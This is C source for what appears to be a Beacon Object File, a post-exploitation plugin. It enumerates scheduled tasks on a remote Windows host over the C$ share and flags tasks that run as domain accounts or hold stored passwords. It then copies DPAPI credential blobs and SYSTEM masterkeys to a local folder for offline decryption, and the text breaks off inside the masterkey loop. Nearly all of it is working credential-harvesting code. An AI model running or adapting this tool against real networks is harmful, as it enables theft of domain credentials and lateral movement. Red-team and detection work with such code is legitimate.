// String Utility Functions
// ============================================================================

/**
 * Safe string length calculation with bounds checking
 */
int bof_strlen(const char* str) {
    if (!str) return 0;
    int len = 0;
    while (str[len] && len < MAX_STRING_LENGTH) len++;
    return len;
}

/**
 * Safe string copy with bounds checking
 */
BOOL bof_strcpy_safe(char* dest, const char* src, int dest_size) {
    if (!dest || !src || dest_size <= 0) return FALSE;
    
    int i = 0;
    while (src[i] && i < (dest_size - 1)) {
        dest[i] = src[i];
        i++;
    }
    dest[i] = '\0';
    return TRUE;
}

/**
 * Safe string concatenation with bounds checking
 */
BOOL bof_strcat_safe(char* dest, const char* src, int dest_size) {
    if (!dest || !src || dest_size <= 0) return FALSE;
    
    int dest_len = bof_strlen(dest);
    int remaining = dest_size - dest_len - 1;
    
    if (remaining <= 0) return FALSE;
    
    int i = 0;
    while (src[i] && i < remaining) {
        dest[dest_len + i] = src[i];
        i++;
    }
    dest[dest_len + i] = '\0';
    return TRUE;
}

/**
 * String comparison function
 */
int bof_strcmp(const char* s1, const char* s2) {
    if (!s1 || !s2) return s1 ? 1 : (s2 ? -1 : 0);
    while (*s1 && (*s1 == *s2)) {
        s1++;
        s2++;
    }
    return *(unsigned char*)s1 - *(unsigned char*)s2;
}

/**
 * Memory initialization function
 */
void bof_memset(void* ptr, int value, size_t num) {
    if (!ptr) return;
    unsigned char* p = (unsigned char*)ptr;
    while (num--) *p++ = (unsigned char)value;
}

/**
 * String search function
 */
char* bof_strstr(const char* haystack, const char* needle) {
    if (!needle || !haystack) return NULL;
    
    int needle_len = (int)bof_strlen(needle);
    if (needle_len == 0) return (char*)haystack;
    
    for (const char* p = haystack; *p; p++) {
        int i;
        for (i = 0; i < needle_len && p[i] == needle[i]; i++);
        if (i == needle_len) {
            return (char*)p;
        }
    }
    return NULL;
}

// Convert string to uppercase (in-place)
void bof_strupper(char* str) {
    while (*str) {
        if (*str >= 'a' && *str <= 'z') {
            *str = *str - 'a' + 'A';
        }
        str++;
    }
}

// Check if a RunAs value appears to represent a domain account (not local/system)
BOOL looks_like_domain_user(const char* runas) {
    if (!runas || bof_strlen(runas) == 0) return FALSE;
    
    char temp[512];
    if (!bof_strcpy_safe(temp, runas, sizeof(temp))) return FALSE;
    bof_strupper(temp);
    
    // Exclude well-known local SIDs (SYSTEM, LOCAL SERVICE, NETWORK SERVICE)
    if (bof_strstr(temp, "S-1-5-18") || bof_strstr(temp, "S-1-5-19") || bof_strstr(temp, "S-1-5-20")) {
        return FALSE;
    }
    
    // If username contains a backslash (DOMAIN\user), treat as domain account
    if (bof_strstr(temp, "\\")) {
        return TRUE;
    }
    
    // If it looks like a UPN (user@domain.com), treat as domain user
    if (bof_strstr(temp, "@") || bof_strstr(temp, ".")) {
        return TRUE;
    }
    
    return FALSE;
}

// Function prototype
void go(char* args, int len);

// Helper functions for XML parsing
char* find_xml_value(char* xml, const char* tag_name, pVirtualAlloc fpVirtualAlloc) {
    char start_tag[64];
    char end_tag[64];
    
    // Build start and end tags
    if (!bof_strcpy_safe(start_tag, "<", sizeof(start_tag))) return NULL;
    if (!bof_strcat_safe(start_tag, tag_name, sizeof(start_tag))) return NULL;
    if (!bof_strcat_safe(start_tag, ">", sizeof(start_tag))) return NULL;
    
    if (!bof_strcpy_safe(end_tag, "</", sizeof(end_tag))) return NULL;
    if (!bof_strcat_safe(end_tag, tag_name, sizeof(end_tag))) return NULL;
    if (!bof_strcat_safe(end_tag, ">", sizeof(end_tag))) return NULL;
    
    // Find start tag
    char* start_pos = bof_strstr(xml, start_tag);
    if (!start_pos) return NULL;
    
    start_pos += bof_strlen(start_tag);
    
    // Find end tag
    char* end_pos = bof_strstr(start_pos, end_tag);
    if (!end_pos) return NULL;
    
    // Allocate and copy the value
    int value_len = (int)(end_pos - start_pos);
    char* value = (char*)fpVirtualAlloc(NULL, value_len + 1, MEM_COMMIT, PAGE_READWRITE);
    if (value) {
        int i;
        for (i = 0; i < value_len; i++) {
            value[i] = start_pos[i];
        }
        value[value_len] = '\0';
    }
    
    return value;
}

// ============================================================================
// File System Helper Functions
// ============================================================================

/**
 * Builds directory path with proper backslash handling
 */
BOOL build_directory_path(char* dest, const char* base_path, const char* sub_path, int dest_size) {
    if (!dest || !base_path || !sub_path || dest_size <= 0) return FALSE;
    
    if (!bof_strcpy_safe(dest, base_path, dest_size)) return FALSE;
    
    // Check if base_path already ends with backslash
    int base_len = bof_strlen(base_path);
    if (base_len > 0 && base_path[base_len - 1] != '\\') {
        if (!bof_strcat_safe(dest, "\\", dest_size)) return FALSE;
    }
    
    return bof_strcat_safe(dest, sub_path, dest_size);
}

/**
 * Creates directory structure recursively for offline mode compatibility
 */
BOOL create_task_directory_structure(const char* save_dir, const char* target_host, 
                                   pCreateDirectoryA fpCreateDirectoryA, char* final_path, int final_path_size) {
    if (!save_dir || !target_host || !fpCreateDirectoryA || !final_path || final_path_size <= 0) {
        return FALSE;
    }
    
    char temp_path[MAX_PATH_LENGTH];
    
    // First create the save_dir if it doesn't exist
    fpCreateDirectoryA(save_dir, NULL);
    
    // Create save_dir\hostname
    if (!build_directory_path(temp_path, save_dir, target_host, sizeof(temp_path))) return FALSE;
    fpCreateDirectoryA(temp_path, NULL);
    
    // Create save_dir\hostname\Windows
    if (!bof_strcat_safe(temp_path, "\\Windows", sizeof(temp_path))) return FALSE;
    fpCreateDirectoryA(temp_path, NULL);
    
    // Create save_dir\hostname\Windows\System32
    if (!bof_strcat_safe(temp_path, "\\System32", sizeof(temp_path))) return FALSE;
    fpCreateDirectoryA(temp_path, NULL);
    
    // Create save_dir\hostname\Windows\System32\Tasks
    if (!bof_strcat_safe(temp_path, "\\Tasks", sizeof(temp_path))) return FALSE;
    fpCreateDirectoryA(temp_path, NULL);
    
    // Copy final path to output
    return bof_strcpy_safe(final_path, temp_path, final_path_size);
}

/**
 * Writes raw buffer content to file with error handling
 */
BOOL write_raw_file(const char* file_path, const char* raw_content, DWORD content_length, 
                   pCreateFileA fpCreateFileA, pWriteFile fpWriteFile, 
                   pCloseHandle fpCloseHandle, pGetLastError fpGetLastError) {
    if (!file_path || !raw_content || content_length == 0) return FALSE;
    
    HANDLE hFile = fpCreateFileA(file_path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        DWORD error = fpGetLastError();
        BeaconPrintf(CALLBACK_ERROR, "[-] CreateFile failed for %s (Error: %d)\n", file_path, error);
        return FALSE;
    }
    
    // Write raw content (preserves UTF-16 BOM and original encoding)
    DWORD bytes_written;
    BOOL result = fpWriteFile(hFile, raw_content, content_length, &bytes_written, NULL);
    
    if (!result) {
        DWORD error = fpGetLastError();
        BeaconPrintf(CALLBACK_ERROR, "[-] WriteFile failed for %s (Error: %d)\n", file_path, error);
    } else if (bytes_written != content_length) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Partial write for %s (%d/%d bytes)\n", file_path, bytes_written, content_length);
        result = FALSE;
    }
    
    fpCloseHandle(hFile);
    return result;
}

/**
 * Writes XML content to file with error handling
 */
BOOL write_xml_file(const char* file_path, const char* xml_content, 
                   pCreateFileA fpCreateFileA, pWriteFile fpWriteFile, 
                   pCloseHandle fpCloseHandle, pGetLastError fpGetLastError) {
    if (!file_path || !xml_content) return FALSE;
    
    HANDLE hFile = fpCreateFileA(file_path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        DWORD error = fpGetLastError();
        BeaconPrintf(CALLBACK_ERROR, "[-] CreateFile failed for %s (Error: %d)\n", file_path, error);
        return FALSE;
    }
    
    // Write content
    DWORD content_len = (DWORD)bof_strlen(xml_content);
    DWORD bytes_written;
    BOOL result = fpWriteFile(hFile, xml_content, content_len, &bytes_written, NULL);
    
    if (!result) {
        DWORD error = fpGetLastError();
        BeaconPrintf(CALLBACK_ERROR, "[-] WriteFile failed for %s (Error: %d)\n", file_path, error);
    } else if (bytes_written != content_len) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Partial write for %s (%d/%d bytes)\n", file_path, bytes_written, content_len);
        result = FALSE;
    }
    
    fpCloseHandle(hFile);
    return result;
}

/**
 * Main function to save task XML with proper directory structure
 */
BOOL save_task_xml(char* save_dir, char* target_host, char* task_name, char* xml_content, 
                   pCreateFileA fpCreateFileA, pWriteFile fpWriteFile, pCloseHandle fpCloseHandle,
                   pCreateDirectoryA fpCreateDirectoryA, pGetLastError fpGetLastError) {
    
    if (!save_dir || !target_host || !task_name || !xml_content) return FALSE;
    
    char tasks_dir_path[MAX_PATH_LENGTH];
    char file_path[MAX_PATH_LENGTH];
    
    // Create the complete directory structure
    if (!create_task_directory_structure(save_dir, target_host, fpCreateDirectoryA, 
                                        tasks_dir_path, sizeof(tasks_dir_path))) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create directory structure\n");
        return FALSE;
    }
    
    // Build complete file path
    if (!build_directory_path(file_path, tasks_dir_path, task_name, sizeof(file_path))) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to build file path\n");
        return FALSE;
    }
    
    // Write the XML file
    return write_xml_file(file_path, xml_content, fpCreateFileA, fpWriteFile, 
                         fpCloseHandle, fpGetLastError);
}

/**
 * Saves raw task XML buffer to file with proper directory structure (for offline compatibility)
 */
BOOL save_raw_task_xml(char* save_dir, char* target_host, const char* task_name, char* raw_buffer, DWORD buffer_size,
                      pCreateFileA fpCreateFileA, pWriteFile fpWriteFile, pCloseHandle fpCloseHandle,
                      pCreateDirectoryA fpCreateDirectoryA, pGetLastError fpGetLastError) {
    
    if (!save_dir || !target_host || !task_name || !raw_buffer || buffer_size == 0) return FALSE;
    
    char tasks_dir_path[MAX_PATH_LENGTH];
    char file_path[MAX_PATH_LENGTH];
    
    // Create the complete directory structure
    if (!create_task_directory_structure(save_dir, target_host, fpCreateDirectoryA, 
                                        tasks_dir_path, sizeof(tasks_dir_path))) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create directory structure\n");
        return FALSE;
    }
    
    // Build complete file path
    if (!build_directory_path(file_path, tasks_dir_path, task_name, sizeof(file_path))) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to build file path\n");
        return FALSE;
    }
    
    // Write the raw XML file (preserves original encoding including UTF-16 BOM)
    return write_raw_file(file_path, raw_buffer, buffer_size, fpCreateFileA, fpWriteFile, 
                         fpCloseHandle, fpGetLastError);
}

// ============================================================================
// XML Processing Functions
// ============================================================================

/**
 * Detects UTF-16 BOM and converts content to ASCII if needed
 */
char* process_xml_encoding(char* buffer, DWORD bytes_read, pVirtualAlloc fpVirtualAlloc) {
    if (!buffer || bytes_read == 0) return NULL;
    
    char* xml_content = NULL;
    
    // Check if file is UTF-16 encoded (BOM: FF FE)
    if (bytes_read >= UTF16_BOM_SIZE && 
        (unsigned char)buffer[0] == 0xFF && (unsigned char)buffer[1] == 0xFE) {
        
        // UTF-16LE BOM detected - convert to ASCII
        xml_content = (char*)fpVirtualAlloc(NULL, (bytes_read / 2) + 1, MEM_COMMIT, PAGE_READWRITE);
        if (xml_content) {
            int ascii_pos = 0;
            for (int i = UTF16_BOM_SIZE; i < (int)bytes_read; i += 2) {
                char c = buffer[i];
                // Keep all valid XML characters including special XML chars like <, >, =, ", /, ?, etc.
                // and printable ASCII plus essential whitespace and control chars
                if (c != '\0') {  // Just exclude null bytes, keep everything else
                    xml_content[ascii_pos++] = c;
                }
            }
            xml_content[ascii_pos] = '\0';
        }
    } else {
        // Regular ASCII/UTF-8 content - make a copy
        xml_content = (char*)fpVirtualAlloc(NULL, bytes_read + 1, MEM_COMMIT, PAGE_READWRITE);
        if (xml_content) {
            for (int i = 0; i < (int)bytes_read; i++) {
                xml_content[i] = buffer[i];
            }
            xml_content[bytes_read] = '\0';
        }
    }
    
    return xml_content;
}

/**
 * Checks if task has stored credentials based on logon type
 */
BOOL task_has_stored_credentials(const char* logon_type) {
    if (!logon_type) return FALSE;
    return bof_strcmp(logon_type, "Password") == 0;
}

/**
 * Extracts all relevant XML values from task content
 */
typedef struct {
    char* run_as;
    char* command;
    char* arguments;
    char* author;
    char* date;
    char* logon_type;
    char* run_level;
    BOOL has_stored_creds;
} TaskInfo;

BOOL parse_task_xml(char* xml_content, TaskInfo* task_info, pVirtualAlloc fpVirtualAlloc) {
    if (!xml_content || !task_info) return FALSE;
    
    bof_memset(task_info, 0, sizeof(TaskInfo));
    
    // Parse XML for key information
    task_info->run_as = find_xml_value(xml_content, "UserId", fpVirtualAlloc);
    task_info->command = find_xml_value(xml_content, "Command", fpVirtualAlloc);
    task_info->arguments = find_xml_value(xml_content, "Arguments", fpVirtualAlloc);
    task_info->author = find_xml_value(xml_content, "Author", fpVirtualAlloc);
    task_info->date = find_xml_value(xml_content, "Date", fpVirtualAlloc);
    task_info->logon_type = find_xml_value(xml_content, "LogonType", fpVirtualAlloc);
    task_info->run_level = find_xml_value(xml_content, "RunLevel", fpVirtualAlloc);
    
    // Determine if task has stored credentials
    task_info->has_stored_creds = task_has_stored_credentials(task_info->logon_type);
    
    return TRUE;
}

/**
 * Cleans up allocated task info memory
 */
void cleanup_task_info(TaskInfo* task_info, pVirtualFree fpVirtualFree) {
    if (!task_info) return;
    
    if (task_info->run_as) fpVirtualFree(task_info->run_as, 0, MEM_RELEASE);
    if (task_info->command) fpVirtualFree(task_info->command, 0, MEM_RELEASE);
    if (task_info->arguments) fpVirtualFree(task_info->arguments, 0, MEM_RELEASE);
    if (task_info->author) fpVirtualFree(task_info->author, 0, MEM_RELEASE);
    if (task_info->date) fpVirtualFree(task_info->date, 0, MEM_RELEASE);
    if (task_info->logon_type) fpVirtualFree(task_info->logon_type, 0, MEM_RELEASE);
    if (task_info->run_level) fpVirtualFree(task_info->run_level, 0, MEM_RELEASE);
    
    bof_memset(task_info, 0, sizeof(TaskInfo));
}

/**
 * Process individual task file and return whether it should be counted
 */
BOOL process_task_file(const char* file_path, const char* file_name, char* target, 
                      char* save_dir, BOOL show_unsaved_creds, DWORD file_size,
                      pCreateFileA fpCreateFileA, pReadFile fpReadFile, pCloseHandle fpCloseHandle,
                      pVirtualAlloc fpVirtualAlloc, pVirtualFree fpVirtualFree,
                      pWriteFile fpWriteFile, pCreateDirectoryA fpCreateDirectoryA, 
                      pGetLastError fpGetLastError) {
    
    char* buffer = NULL;
    
    HANDLE hFile = fpCreateFileA(file_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] Could not read: %s\n", file_name);
        return FALSE;
    }
    
    if (file_size == INVALID_FILE_SIZE || file_size >= MAX_FILE_SIZE) {
        fpCloseHandle(hFile);
        return FALSE;
    }
    
    // Allocate buffer
    buffer = (char*)fpVirtualAlloc(NULL, file_size + 1, MEM_COMMIT, PAGE_READWRITE);
    if (!buffer) {
        fpCloseHandle(hFile);
        return FALSE;
    }
    
    DWORD bytes_read = 0;
    if (!fpReadFile(hFile, buffer, file_size, &bytes_read, NULL)) {
        fpVirtualFree(buffer, 0, MEM_RELEASE);
        fpCloseHandle(hFile);
        return FALSE;
    }
    
    fpCloseHandle(hFile);
    buffer[bytes_read] = '\0';
    
    // Process XML content
    char* xml_content = process_xml_encoding(buffer, bytes_read, fpVirtualAlloc);
    if (!xml_content) {
        fpVirtualFree(buffer, 0, MEM_RELEASE);
        return FALSE;
    }
    
    // Parse XML using TaskInfo structure
    TaskInfo task_info;
    if (!parse_task_xml(xml_content, &task_info, fpVirtualAlloc)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse task XML: %s\n", file_name);
        fpVirtualFree(xml_content, 0, MEM_RELEASE);
        fpVirtualFree(buffer, 0, MEM_RELEASE);
        return FALSE;
    }
    
    // Apply filtering logic
    BOOL should_display = FALSE;
    if (task_info.run_as) {
        BOOL has_stored_creds = task_info.has_stored_creds;
        
        // Show task if it's a domain user OR if it has stored credentials
        if (looks_like_domain_user(task_info.run_as) || has_stored_creds) {
            // Only show if they have stored creds OR unsaved-creds flag is set
            if (has_stored_creds || show_unsaved_creds) {
                should_display = TRUE;
            }
        }
    }
    
    BOOL task_processed = FALSE;
    if (should_display) {
        // Save file if save directory specified (only save filtered tasks)
        if (save_dir) {
            if (save_raw_task_xml(save_dir, target, file_name, buffer, bytes_read, fpCreateFileA, 
                                fpWriteFile, fpCloseHandle, fpCreateDirectoryA, fpGetLastError)) {
                BeaconPrintf(CALLBACK_OUTPUT, "[+] Saved: %s\\%s\\Windows\\System32\\Tasks\\%s\n", save_dir, target, file_name);
            } else {
                BeaconPrintf(CALLBACK_OUTPUT, "[-] Failed to save: %s\\%s\\Windows\\System32\\Tasks\\%s\n", save_dir, target, file_name);
            }
        }
        
        // Format output line
        char output_line[MAX_OUTPUT_LINE_SIZE];
        if (bof_strcpy_safe(output_line, file_name, sizeof(output_line)) &&
            bof_strcat_safe(output_line, ": ", sizeof(output_line))) {
            
            if (task_info.run_as) {
                bof_strcat_safe(output_line, task_info.run_as, sizeof(output_line));
                bof_strcat_safe(output_line, " is executing ", sizeof(output_line));
            }
            
            if (task_info.command) {
                bof_strcat_safe(output_line, task_info.command, sizeof(output_line));
                if (task_info.arguments) {
                    bof_strcat_safe(output_line, " ", sizeof(output_line));
                    bof_strcat_safe(output_line, task_info.arguments, sizeof(output_line));
                }
            }
            
            // Add credential type indicator
            if (task_info.logon_type) {
                const char* cred_indicator = task_info.has_stored_creds ? " [STORED CREDS]" : " [INTERACTIVE TOKEN]";
                bof_strcat_safe(output_line, cred_indicator, sizeof(output_line));
            }
            
            BeaconPrintf(CALLBACK_OUTPUT, "%s\n", output_line);
            task_processed = TRUE;
        }
    }
    
    // Cleanup
    cleanup_task_info(&task_info, fpVirtualFree);
    fpVirtualFree(xml_content, 0, MEM_RELEASE);
    fpVirtualFree(buffer, 0, MEM_RELEASE);
    
    return task_processed;
}

/**
 * Recursively traverse directories and process task files
 */
int traverse_task_directory(const char* base_path, const char* current_subdir, char* target, 
                           char* save_dir, BOOL show_unsaved_creds,
                           pFindFirstFileA fpFindFirstFileA, pFindNextFileA fpFindNextFileA, 
                           pFindClose fpFindClose, pCreateFileA fpCreateFileA, pReadFile fpReadFile,
                           pCloseHandle fpCloseHandle, pGetFileSize fpGetFileSize,
                           pVirtualAlloc fpVirtualAlloc, pVirtualFree fpVirtualFree,
                           pWriteFile fpWriteFile, pCreateDirectoryA fpCreateDirectoryA, 
                           pGetLastError fpGetLastError) {
    
    char search_path[MAX_PATH_LENGTH];
    char current_dir_path[MAX_PATH_LENGTH];
    WIN32_FIND_DATAA findFileData;
    HANDLE hFind;
    int task_count = 0;
    
    // Build the current directory path
    if (!bof_strcpy_safe(current_dir_path, base_path, sizeof(current_dir_path))) return 0;
    if (current_subdir && bof_strlen(current_subdir) > 0) {
        if (!bof_strcat_safe(current_dir_path, "\\", sizeof(current_dir_path)) ||
            !bof_strcat_safe(current_dir_path, current_subdir, sizeof(current_dir_path))) return 0;
    }
    
    // Build search path for all files and directories in current directory
    if (!bof_strcpy_safe(search_path, current_dir_path, sizeof(search_path)) ||
        !bof_strcat_safe(search_path, "\\*", sizeof(search_path))) return 0;
    
    hFind = fpFindFirstFileA(search_path, &findFileData);
    if (hFind == INVALID_HANDLE_VALUE) {
        return 0;
    }
    
    do {
        // Skip . and .. entries
        if (bof_strcmp(findFileData.cFileName, ".") == 0 || 
            bof_strcmp(findFileData.cFileName, "..") == 0) {
            continue;
        }
        
        if (findFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
            // This is a subdirectory - recurse into it
            char subdir_path[MAX_PATH_LENGTH];
            if (current_subdir && bof_strlen(current_subdir) > 0) {
                if (bof_strcpy_safe(subdir_path, current_subdir, sizeof(subdir_path)) &&
                    bof_strcat_safe(subdir_path, "\\", sizeof(subdir_path)) &&
                    bof_strcat_safe(subdir_path, findFileData.cFileName, sizeof(subdir_path))) {
                    task_count += traverse_task_directory(base_path, subdir_path, target, save_dir, show_unsaved_creds,
                                                        fpFindFirstFileA, fpFindNextFileA, fpFindClose, 
                                                        fpCreateFileA, fpReadFile, fpCloseHandle, fpGetFileSize,
                                                        fpVirtualAlloc, fpVirtualFree, fpWriteFile, 
                                                        fpCreateDirectoryA, fpGetLastError);
                }
            } else {
                task_count += traverse_task_directory(base_path, findFileData.cFileName, target, save_dir, show_unsaved_creds,
                                                    fpFindFirstFileA, fpFindNextFileA, fpFindClose, 
                                                    fpCreateFileA, fpReadFile, fpCloseHandle, fpGetFileSize,
                                                    fpVirtualAlloc, fpVirtualFree, fpWriteFile, 
                                                    fpCreateDirectoryA, fpGetLastError);
            }
        } else {
            // This is a file - skip system files and process task files
            if (bof_strcmp(findFileData.cFileName, "desktop.ini") == 0) {
                continue;
            }
            
            // Build full path to the file
            char full_path[MAX_PATH_LENGTH];
            if (!bof_strcpy_safe(full_path, current_dir_path, sizeof(full_path)) ||
                !bof_strcat_safe(full_path, "\\", sizeof(full_path)) ||
                !bof_strcat_safe(full_path, findFileData.cFileName, sizeof(full_path))) {
                continue;
            }
            
            // Get file size
            HANDLE hFile = fpCreateFileA(full_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
            if (hFile != INVALID_HANDLE_VALUE) {
                DWORD file_size = fpGetFileSize(hFile, NULL);
                fpCloseHandle(hFile);
                
                // Process the task file (allocates its own buffer internally)
                if (process_task_file(full_path, findFileData.cFileName, target, save_dir, show_unsaved_creds,
                                    file_size, fpCreateFileA, fpReadFile, fpCloseHandle,
                                    fpVirtualAlloc, fpVirtualFree, fpWriteFile, fpCreateDirectoryA, fpGetLastError)) {
                    task_count++;
                }
            }
        }
    } while (fpFindNextFileA(hFind, &findFileData) != 0);
    
    fpFindClose(hFind);
    return task_count;
}

// ============================================================================
// DPAPI Credential & Masterkey Collection Functions
// ============================================================================

/**
 * Creates directory structure for saving credential blobs
 * Creates: save_dir\hostname\credentials
 */
BOOL create_credentials_directory(const char* save_dir, const char* target_host,
                                 pCreateDirectoryA fpCreateDirectoryA, char* final_path, int final_path_size) {
    if (!save_dir || !target_host || !fpCreateDirectoryA || !final_path || final_path_size <= 0) {
        return FALSE;
    }
    
    char temp_path[MAX_PATH_LENGTH];
    
    // First create the save_dir if it doesn't exist
    fpCreateDirectoryA(save_dir, NULL);
    
    // Create save_dir\hostname
    if (!build_directory_path(temp_path, save_dir, target_host, sizeof(temp_path))) return FALSE;
    fpCreateDirectoryA(temp_path, NULL);
    
    // Create save_dir\hostname\credentials
    if (!bof_strcat_safe(temp_path, "\\credentials", sizeof(temp_path))) return FALSE;
    fpCreateDirectoryA(temp_path, NULL);
    
    // Copy final path to output
    return bof_strcpy_safe(final_path, temp_path, final_path_size);
}

/**
 * Creates directory structure for saving masterkeys
 * Creates: save_dir\hostname\masterkeys
 */
BOOL create_masterkeys_directory(const char* save_dir, const char* target_host,
                                pCreateDirectoryA fpCreateDirectoryA, char* final_path, int final_path_size) {
    if (!save_dir || !target_host || !fpCreateDirectoryA || !final_path || final_path_size <= 0) {
        return FALSE;
    }
    
    char temp_path[MAX_PATH_LENGTH];
    
    // First create the save_dir if it doesn't exist
    fpCreateDirectoryA(save_dir, NULL);
    
    // Create save_dir\hostname
    if (!build_directory_path(temp_path, save_dir, target_host, sizeof(temp_path))) return FALSE;
    fpCreateDirectoryA(temp_path, NULL);
    
    // Create save_dir\hostname\masterkeys
    if (!bof_strcat_safe(temp_path, "\\masterkeys", sizeof(temp_path))) return FALSE;
    fpCreateDirectoryA(temp_path, NULL);
    
    // Copy final path to output
    return bof_strcpy_safe(final_path, temp_path, final_path_size);
}

/**
 * Collects all credential blobs from remote system
 * Path: \\target\C$\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\*
 */
int collect_credential_blobs(const char* remote_path, const char* target, const char* save_dir,
                            pFindFirstFileA fpFindFirstFileA, pFindNextFileA fpFindNextFileA,
                            pFindClose fpFindClose, pCreateFileA fpCreateFileA,
                            pReadFile fpReadFile, pCloseHandle fpCloseHandle,
                            pGetFileSize fpGetFileSize, pVirtualAlloc fpVirtualAlloc,
                            pVirtualFree fpVirtualFree, pWriteFile fpWriteFile,
                            pCreateDirectoryA fpCreateDirectoryA, pGetLastError fpGetLastError) {
    
    WIN32_FIND_DATAA findFileData;
    char search_path[MAX_PATH_LENGTH];
    char full_path[MAX_PATH_LENGTH];
    char save_path[MAX_PATH_LENGTH];
    char creds_dir[MAX_PATH_LENGTH];
    int blob_count = 0;
    
    // Build credential blobs path: \\target\C$\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\*
    if (!bof_strcpy_safe(search_path, remote_path, sizeof(search_path))) return 0;
    if (!bof_strcat_safe(search_path, "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\\*", sizeof(search_path))) return 0;
    
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Enumerating credential blobs...\n");
    
    HANDLE hFind = fpFindFirstFileA(search_path, &findFileData);
    if (hFind == INVALID_HANDLE_VALUE) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to enumerate credential blobs (Error: %d)\n", fpGetLastError());
        return 0;
    }
    
    // Create credentials save directory
    if (!create_credentials_directory(save_dir, target, fpCreateDirectoryA, creds_dir, sizeof(creds_dir))) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create credentials directory\n");
        fpFindClose(hFind);
        return 0;
    }
    
    do {
        // Skip directories and special entries
        if (findFileData.cFileName[0] == '.' ||
            (findFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
            continue;
        }
        
        // Only process small files (credential blobs are typically < 10KB)
        DWORD file_size = findFileData.nFileSizeLow;
        if (file_size > 10000 || file_size == 0) {
            continue;
        }
        
        // Build full remote path
        if (!bof_strcpy_safe(full_path, remote_path, sizeof(full_path))) continue;
        if (!bof_strcat_safe(full_path, "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\\", sizeof(full_path))) continue;
        if (!bof_strcat_safe(full_path, findFileData.cFileName, sizeof(full_path))) continue;
        
        // Read the credential blob file
        HANDLE hFile = fpCreateFileA(full_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile == INVALID_HANDLE_VALUE) {
            continue;
        }
        
        // Allocate buffer for file content
        char* buffer = (char*)fpVirtualAlloc(NULL, file_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (!buffer) {
            fpCloseHandle(hFile);
            continue;
        }
        
        // Read file content
        DWORD bytes_read;
        if (!fpReadFile(hFile, buffer, file_size, &bytes_read, NULL) || bytes_read != file_size) {
            fpVirtualFree(buffer, 0, MEM_RELEASE);
            fpCloseHandle(hFile);
            continue;
        }
        fpCloseHandle(hFile);
        
        // Build save path
        if (!build_directory_path(save_path, creds_dir, findFileData.cFileName, sizeof(save_path))) {
            fpVirtualFree(buffer, 0, MEM_RELEASE);
            continue;
        }
        
        // Write the blob file
        if (write_raw_file(save_path, buffer, file_size, fpCreateFileA, fpWriteFile, fpCloseHandle, fpGetLastError)) {
            blob_count++;
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Collected credential blob: %s (%d bytes)\n", findFileData.cFileName, file_size);
        }
        
        fpVirtualFree(buffer, 0, MEM_RELEASE);
        
    } while (fpFindNextFileA(hFind, &findFileData) != 0);
    
    fpFindClose(hFind);
    return blob_count;
}

/**
 * Collects all SYSTEM masterkeys from remote system
 * Path: \\target\C$\Windows\System32\Microsoft\Protect\S-1-5-18\User\*
 */
int collect_masterkeys(const char* remote_path, const char* target, const char* save_dir,
                      pFindFirstFileA fpFindFirstFileA, pFindNextFileA fpFindNextFileA,
                      pFindClose fpFindClose, pCreateFileA fpCreateFileA,
                      pReadFile fpReadFile, pCloseHandle fpCloseHandle,
                      pGetFileSize fpGetFileSize, pVirtualAlloc fpVirtualAlloc,
                      pVirtualFree fpVirtualFree, pWriteFile fpWriteFile,
                      pCreateDirectoryA fpCreateDirectoryA, pGetLastError fpGetLastError) {
    
    WIN32_FIND_DATAA findFileData;
    char search_path[MAX_PATH_LENGTH];
    char full_path[MAX_PATH_LENGTH];
    char save_path[MAX_PATH_LENGTH];
    char masterkeys_dir[MAX_PATH_LENGTH];
    int masterkey_count = 0;
    
    // Build masterkey path: \\target\C$\Windows\System32\Microsoft\Protect\S-1-5-18\User\*
    if (!bof_strcpy_safe(search_path, remote_path, sizeof(search_path))) return 0;
    if (!bof_strcat_safe(search_path, "\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\User\\*", sizeof(search_path))) return 0;
    
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Enumerating SYSTEM masterkeys...\n");
    
    HANDLE hFind = fpFindFirstFileA(search_path, &findFileData);
    if (hFind == INVALID_HANDLE_VALUE) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to enumerate masterkeys (Error: %d)\n", fpGetLastError());
        return 0;
    }
    
    // Create masterkeys save directory
    if (!create_masterkeys_directory(save_dir, target, fpCreateDirectoryA, masterkeys_dir, sizeof(masterkeys_dir))) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create masterkeys directory\n");
        fpFindClose(hFind);
        return 0;
    }
    
    do {
        // Skip directories and special entries
        if (findFileData.cFileName[0] == '.' ||
            (findFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
            continue;
        }
        
        // Get file size
        DWORD file_size = findFileData.nFileSizeLow;
